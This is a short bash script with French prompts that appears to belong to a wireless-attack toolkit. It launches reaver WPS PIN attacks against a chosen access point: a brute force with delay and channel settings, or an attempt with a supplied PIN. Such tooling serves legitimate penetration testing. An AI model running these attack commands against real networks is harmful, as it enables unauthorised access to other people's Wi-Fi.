#! /bin/bash
#############DEFAUTS###############
#début Jaune 
YS="\e[1;33m"
#couleur de fin
CE="\e[0m"
#début Rouge
RS="\e[1;31m"
#réglage variables fréquentes
YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=yes)"
YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=no)"
YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
PAKT="Appuyez sur "$YS"une touche$CE pour"
PAKTC="Appuyez sur "$YS"une touche$CE pour continuer..."
PAKTGB="Appuyez sur "$YS"une touche$CE pour revenir en arrière..."

####################################
printf '\033]2;REAVER\a' &&
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
if [[ "$GLV" = "2" ]]
then
	echo -e "Veuillez noter que vous avez besoin d'un très bon signal pour que cela fonctionne."
	sleep 3
	echo -e "Lancement..."
	sleep 1
	clear
	reaver -i $WLANNM -b $BSSIDT -d $DELT -S -N -c $CHANT -vv 
	echo -e "$PAKTC" 
	read
elif [[ "$GLV" = "3" ]]
then
	reaver -i $WLANNM -b $BSSIDT -p $WPST -vv
	echo -e "$PAKTC"
	read

fi
